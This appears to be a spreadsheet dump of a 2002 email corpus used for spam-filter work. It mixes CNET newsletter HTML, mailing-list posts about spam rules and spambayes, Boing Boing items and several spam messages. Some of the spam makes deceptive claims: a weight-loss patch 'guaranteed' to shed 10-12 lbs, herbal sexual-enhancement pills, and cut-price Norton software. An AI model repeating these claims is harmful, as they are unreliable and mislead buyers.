 &lt;tr&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#CCCCCC"&gt;&lt;img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bgcolor="#666666"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width="599" bgcolor="#EEEEEE"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#EEEEEE"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width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;&lt;img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HREF='http://clickthru.online.com/Click?q=48-ggsbzRBpVdwCyNM7lf1Q1FD9nc3paRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdLlgMoobvZm5yGKIaeR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKEiYRgMrqMtNXjoCKqyR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#CCCCCC" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr height="18"&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#666666"&gt;&lt;img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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=87-izOO-mntW1YpNhZVBel8jJ_eZsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Bill Stoddard wrote:
 &gt; 
 &gt; Wishful thinking. People are just bigger dickheads now.
 nah, they've always been this way.
 &gt; Culture is changing and it is becoming acceptable to get in
 &gt; peoples face and shout them down when you disagree with them.
 culture changing, yeh.  'those who fail to learn from history..'
 what does it tell you when a market chain is named 'bread and circus'
 and no-one twigs?
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Distributed.net cracks the RC5-64 cipher
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85512053
 Date: Not supplied
 The Distributed.net project -- a precursor to SETI@Home that used volunteer 
 computer-time to attack giant, sophisticated ciphers -- has cracked RC564. I 
 used to have half a dozen computers working on this. 
     On 14-Jul-2002, a relatively characterless PIII-450 in Tokyo returned the 
     winning key to the distributed.net keyservers. The key 0x63DE7DC154F4D039 
     produces the plaintext output: 
     The unknown message is: some things are better left unread 
     Unfortunately, due to breakage in scripts (dbaker's fault, naturally) on 
     the keymaster, this successful submission was not automatically detected. 
     It sat undiscovered until 12-Aug-2002. The key was immediately submitted to 
     RSA Labs and was verified as the winning key.  
 Link[1] Discuss[2] (_Thanks, Dave[3]!_)
 [1] http://www.distributed.net/pressroom/news-20020926.html
 [2] http://www.quicktopic.com/boing/H/wf6mvUdf3xfR
 [3] http://www.seizethedave.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:
 &gt; distro.  There's even a tarball[1] with this
 segfault.  core dumped.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Join the Web's Hottest &amp; Fastest Growing Community                     11.70
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 1) Join the Web's Hottest &amp; Fastest Growing Community
 It Is So Hot! &lt;http://www.adclick.ws/p.cfm?o=259&amp;s=pk007&gt; 
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 &lt;http://www.adclick.ws/p.cfm?o=249&amp;s=pk007&gt; 
 3) Get the Child Support You Deserve
 Free Legal Advice &lt;http://www.adclick.ws/p.cfm?o=245&amp;s=pk002&gt; 
 Have a Wonderful Day, 
 Offer Manager
  &lt;http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417&gt; 
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 1) Join the Web's Hottest &amp; Fastest Growing Community&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D259&amp;s=3Dpk007" =
 target=3D"_blank"&gt;It Is=20
   So Hot!&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   2) Guaranteed to lose 10-12 lbs in 30 days&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D249&amp;s=3Dpk007" =
 target=3D"_blank"&gt;Slim=20
   Patch - Weight Loss Patches&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   3) Get the Child Support You Deserve&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D245&amp;s=3Dpk002" =
 target=3D"_blank"&gt;Free=20
   Legal Advice&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
   Have a Wonderful Day, &lt;br&gt;
   Offer Manager&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;a =
 href=3D"http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417"&gt;&lt;img =
 border=3D"0" =
 src=3D"http://209.63.151.9/trim/?17%7C306356%7C6644"&gt;&lt;/a&gt;&lt;/center&gt;&lt;/body&gt;=
 &lt;/html&gt;
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0--
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613661,159/
 Date: 2002-10-06T18:12:59+01:00
 Rendering polygons is not as easy as it used to be, the reason being the vast 
 amount of different rendering techniques, methods and algorithms available. Not 
 only is choosing the right ones a problem, even worse, all that are selected 
 need to work together. There are some algorithms which simply do not work 
 together, and in that case, only one may be used whilt the other one needs to 
 be replaced witha more compatible method. This feature explores how Factor 5 
 approached the problem when developing Rogue Leader for Gamecube.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial....                      S
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF"  size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/index.asp?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and Women - Your's Risk=
  Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The all natural s=
 afe formula for men and women your's risk free for 30 days. Mother Nature'=
 s wonder pill of the 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart from further contac=
 ts
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/service.html"&gt;Click Here&lt;/a=
 &gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 phillipm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Spam host?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Mike Bostock" said:
 &gt; Received: from tracking2 (tracking2.roving.com [10.20.40.142])
 &gt; 	by ccm01.roving.com (Postfix) with ESMTP id 4696633ED4
 &gt; 	for &lt;mike@mydomain.co.uk&gt;; Sun, 22 Sep 2002 17:57:03 -0400 (EDT)
 &gt; X-Mailer: Roving Constant Contact
 &gt; 5.0.Patch121c.P121C_SchedEnhancement_09_05_02
 &gt; (http://www.constantcontact.com)
 &gt; 
 &gt; Is worthy of attention and a rule - if you go to their web site it
 &gt; would appear that they are in the business of email mass marketing. 
 &gt; Unfortunately their mailing to me got through Spamassassin :-(
 Interesting -- I haven't seen anything from these guys in about a year,
 but looking at your hdr they're still doing it.
 OK, come up with an X-Mailer rule that hits your mails, and we'll put it
 in testing...
 --j.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</si>
  <si>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Call me                    34472
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bin Laden is still alive, reveals spy phone satellite
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597652,215/
 Date: 2002-10-06T02:28:03+01:00
 *World latest: *Osama bin Laden is alive and regularly meeting Mullah Omar, the 
 fugitive leader of the Taliban, according to a telephone call intercepted by 
 American spy satellites.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IRR] The 3rd Annual Consult Hyperion Digital Identity Forum
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 User-Agent: Microsoft-Entourage/10.1.0.2006
 Date: Thu, 03 Oct 2002 07:56:39 +0100
 Subject: The 3rd Annual Consult Hyperion Digital Identity Forum
 From: "David G.W. Birch" &lt;dgw-lists@birches.org&gt;
 To: Bob Hettinga &lt;rah@shipwright.com&gt;
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;
 Dear All,
 See www.digitalidentityforum.com for more details. Speakers include
 Microsoft and Liberty Alliance, UK central and local government, law
 enforcement, financial services (Egg and RBS/NatWest), EC Research Centre, a
 psychologist and others. Look forward to seeing you there.
 Regards,
 Dave Birch.
 -- 
 -- David Birch, Director, Consult Hyperion
 -- 
 -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 -- mail dave@chyp.com, web http://www.chyp.com
 -- 
 -- See you at the 2nd Annual Digital Transactions Forum in Singapore
 -- October 16th/17th 2002, see http://www.digitaltransactionsforum.com/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_______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: re:  SYSTEMWORKS CLEARANCE SALE_ONLY $29.99 0989sqJ-7
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C5_44B43D7A.C5027E65
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 QVRURU5USU9OOiBUaGlzIGlzIGEgTVVTVCBmb3IgQUxMIENvbXB1dGVyIFVz
 ZXJzISEhDQoNCipORVctU3BlY2lhbCBQYWNrYWdlIERlYWwhKg0KDQpOb3J0
 b24gU3lzdGVtV29ya3MgMjAwMiBTb2Z0d2FyZSBTdWl0ZSAtUHJvZmVzc2lv
 bmFsIEVkaXRpb24tDQoNCkluY2x1ZGVzIFNpeCAtIFllcyA2ISAtIEZlYXR1
 cmUtUGFja2VkIFV0aWxpdGllcw0KQUxMIEZvciAxIFNwZWNpYWwgTE9XIFBy
 aWNlIQ0KDQpUaGlzIFNvZnR3YXJlIFdpbGw6DQotIFByb3RlY3QgeW91ciBj
 b21wdXRlciBmcm9tIHVud2FudGVkIGFuZCBoYXphcmRvdXMgdmlydXNlcw0K
 LSBIZWxwIHNlY3VyZSB5b3VyIHByaXZhdGUgJiB2YWx1YWJsZSBpbmZvcm1h
 dGlvbg0KLSBBbGxvdyB5b3UgdG8gdHJhbnNmZXIgZmlsZXMgYW5kIHNlbmQg
 ZS1tYWlscyBzYWZlbHkNCi0gQmFja3VwIHlvdXIgQUxMIHlvdXIgZGF0YSBx
 dWljayBhbmQgZWFzaWx5DQotIEltcHJvdmUgeW91ciBQQydzIHBlcmZvcm1h
 bmNlIHcvc3VwZXJpb3IgaW50ZWdyYWwgZGlhZ25vc3RpY3MhDQoNCjYgRmVh
 dHVyZS1QYWNrZWQgVXRpbGl0aWVzLi4uMSBHcmVhdCBQcmljZSENCkEgJDMw
 MCsgQ29tYmluZWQgUmV0YWlsIFZhbHVlIQ0KDQpZT1VSUyBmb3IgT25seSAk
 MjkuOTkhICA8SW5jbHVkZXMgRlJFRSBTaGlwcGluZyE+DQoNCkRvbid0IGZh
 bGwgcHJleSB0byBkZXN0cnVjdGl2ZSB2aXJ1c2VzIG9yIGhhY2tlcnMhDQpQ
 cm90ZWN0ICB5b3VyIGNvbXB1dGVyIGFuZCB5b3VyIHZhbHVhYmxlIGluZm9y
 bWF0aW9uIQ0KDQoNClNvIGRvbid0IGRlbGF5Li4uZ2V0IHlvdXIgY29weSBU
 T0RBWSENCg0KDQpodHRwOi8vc2FtLmhvc3RjZW50cmVsLmNvbS9ub3J0b24v
 DQorKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrDQpUaGlzIGVtYWls
 IGhhcyBiZWVuIHNjcmVlbmVkIGFuZCBmaWx0ZXJlZCBieSBvdXIgaW4gaG91
 c2UgIiJPUFQtT1VUIiIgc3lzdGVtIGluIA0KY29tcGxpYW5jZSB3aXRoIHN0
 YXRlIGxhd3MuIElmIHlvdSB3aXNoIHRvICJPUFQtT1VUIiBmcm9tIHRoaXMg
 bWFpbGluZyBhcyB3ZWxsIA0KYXMgdGhlIGxpc3RzIG9mIHRob3VzYW5kcyAg
 b2Ygb3RoZXIgZW1haWwgcHJvdmlkZXJzIHBsZWFzZSB2aXNpdCAgDQoNCmh0
 dHA6Ly9zYW0uaG9zdGNlbnRyZWwuY29tL210Zy9vcHRvdXQuaHRtbA0KKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKw0KDQo2MDgwc1VwajMtMTc4
 Q1NndTkxNDlsMjA=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 739] rules broken: RATWARE_*
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=739
 spamassassin-contrib@msquadrat.de changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |WONTFIX
 ------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:17 -------
 Relieving Dan ;-)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</si>
  <si>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Quite independently from testing and tuning the algorithm, I'd like to
 think about deployment.
 Eventually, individuals and postmasters should be able to download a
 spambayes software distribution, answer a few configuration questions
 about their mail setup, training and false positives, and install it
 as a filter.
 A more modest initial goal might be the production of a tool that can
 easily be used by individuals (since we're more likely to find
 individuals willing to risk this than postmasters).
 There are many ways to do this.  Some ideas:
 - A program that acts both as a pop client and a pop server.  You
   configure it by telling it about your real pop servers.  You then
   point your mail reader to the pop server at localhost.  When it
   receives a connection, it connects to the remote pop servers, reads
   your mail, and gives you only the non-spam.  To train it, you'd only
   need to send it the false negatives somehow; it can assume that
   anything is ham that you don't say is spam within 48 hours.
 - A server with a custom protocol that you send a copy of a message
   and that answers "spam" or "ham".  Then you have a little program
   that is invoked e.g. by procmail that talks to the server.  (The
   server exists so that it doesn't have to load the pickle with the
   scoring database for each message.  I don't know how big that pickle
   would be, maybe loading it each time is fine.  Or maybe
   marshalling.)
 - Your idea here.
 Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The Perl
 Bayes filter advertised on slashdot?
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fake News Headlines: Basque Explosion Chases Ends In
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485775
 Date: Not supplied
 NewZoid generates fake news-headlines: 
     1- Miss Universe Calling For Isidore 
     2- Rumsfeld Suggests Aspirin Reduces Alzheimer's Risk 
     3- Editorial Attacks Computer System 
     4- Stressed Out? Just Call For New TV Show 
     5- Gore To Hear About It 
     6- Nurses To Be Given Their Own Passports On Iraq Action 
     7- US Arraigned In Fighting Slavery 
     8- Lisa Riley Lines Below Chaos Above  
 Link[1] Discuss[2] (_Thanks, Daniel[3]!_)
 [1] http://www.newzoid.com/nzheadlinecombo.asp
 [2] http://www.quicktopic.com/boing/H/8juRS7A4p6JY
 [3] http://www.newzoid.com
</t>
  </si>
  <si>
    <t xml:space="preserve">At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
 &gt; "Free trade and free markets have proven their ability to lift whole
 &gt; societies out of poverty"
 &gt; I'm not a socio-political/history buff - does anybody have some clear
 &gt; examples?
 You're probably living in one, or you wouldn't be able to post here.
 ;-).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</si>
  <si>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&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;CNET | News.context&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
     &lt;td width=442 colspan=4 bgcolor="#e5e5e5"&gt;
         &lt;img src="http://home.cnet.com/i/ne/ds/nched.gif" alt="" width="442" height="63" border="0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=160 rowspan=2 align=center&gt;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href="http://clickthru.online.com/Click?q=cd-VHhSQzsKThB3tiBFjAi_TOlRfXuR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzisJCKDOENBEZdihv9KsR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzoJf3jfOlrZIGiR6ImOZR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CKATRE6Nv0T0QkY6b7uR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArW4RVhVuo4I9yc99NcsR"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width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=252&gt;
 	&lt;tr&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/i/ne/ds/nc.gif" alt="News.context" width="76" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 	&lt;td align=right&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	&lt;p&gt;
 		&lt;img src="http://news.cnet.com/i/ne/pr/gr/prtease_cooper.gif" width="65" height="82" border="0" align="right"&gt;&lt;b&gt;Hollywood &amp; Silicon Valley: A way out?&lt;/b&gt;&lt;p&gt;
 		The controversy over digital file swapping is no closer to an amicable resolution than it was when peer-to-peer technology first came into vogue.
 		&lt;p&gt;
 		&lt;a href="mailto:charles.cooper@cnet.com"&gt;Charlie Cooper&lt;/a&gt;, Executive Editor/Commentary&lt;br&gt;
 		&amp;nbsp;&lt;br&gt;
 	&lt;/font&gt;&lt;/td&gt;
    &lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;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&lt;b&gt;Just desserts for scofflaws&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 U.S. Rep. &lt;b&gt;Howard L. Berman&lt;/b&gt; weighed in this week, arguing that piracy over P2P networks robs songwriters on a massive scale. The congressman from Hollywood has authored a bill to stop illegal digital downloads by giving copyright owners the ability to technologically impair the distribution of copyrighted works.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSrjTP9wQ93KjZ6eJcnZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Spotting a scam in sheep's clothing&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Berman's proposal received a cool reception in Silicon Valley, where rules are frowned upon and unfettered innovation reigns supreme. So it was that StreamCast CEO &lt;b&gt;Steve Griffin&lt;/b&gt; spoke for many in the community when he wrote that Berman's proposal won't work. What's more, he wondered, was Berman really concerned about controlling piracy, or could the congressman from Hollywood be influenced by certain constituents? Conspiracy buffs this week had a field day.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6YaLksnAu7hgvo2AKenR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;How to curb digital piracy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The odds that either side will raise the white flag are slim. But must this debate necessarily turn into an endless donnybrook? Former White House staffer &lt;b&gt;Jonathan Greenblatt&lt;/b&gt; doesn't buy into historical determinism, and believes Hollywood can respond to the challenge of new media. First, it must shy away from any legislation that aims to control technology or enforces any "draconian" digital rights management rules. What other suggestions does he offer? Read on.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLj9WWtbcj4JYndFK-AWlrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Writing file sharing's final chapter&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 All this occurs as the P2P community lost one of its brighter lights. Computer scientist and entrepreneur &lt;b&gt;Gene Kan&lt;/b&gt; died June 29. Kan, who helped to develop an early open-source version of Gnutella software, wrote a column for CNET News.com on June 21, drawing on the lessons learned from the history of peer-to-peer technology. In this highly nuanced piece, Kan offers a timely warning about what can happen when people get overly excited about new technologies.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3QFd7XP1okYP2r70U6iR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;CEOs: Are you too focused?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Conventional wisdom has it that "focus" is de rigueur for any corporation hoping to achieve superior performance. The flip side of this argument is that markets are quick to discount the valuations of diversified companies because of perceived shortcomings. But researchers at McKinsey offer an alternative idea, suggesting that there's a particularly fertile middle ground between focus and diversification.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHt02tYEVFm8il40AWNdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKME2dMZZGkeHaXeD3gBcR" &gt;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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=b6-ll1UrMKLBLlFrFG3lrCqXXqIP7Q05RRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcgJT0IjyXYHRf_uaHkFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH08xGStxkPhB7mxUT9A9R"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href="http://clickthru.online.com/Click?q=f5-lTbRQgwx1j6smFm6DmLwgkaZmRuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscyRQAefBwhq6GOxuYzsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
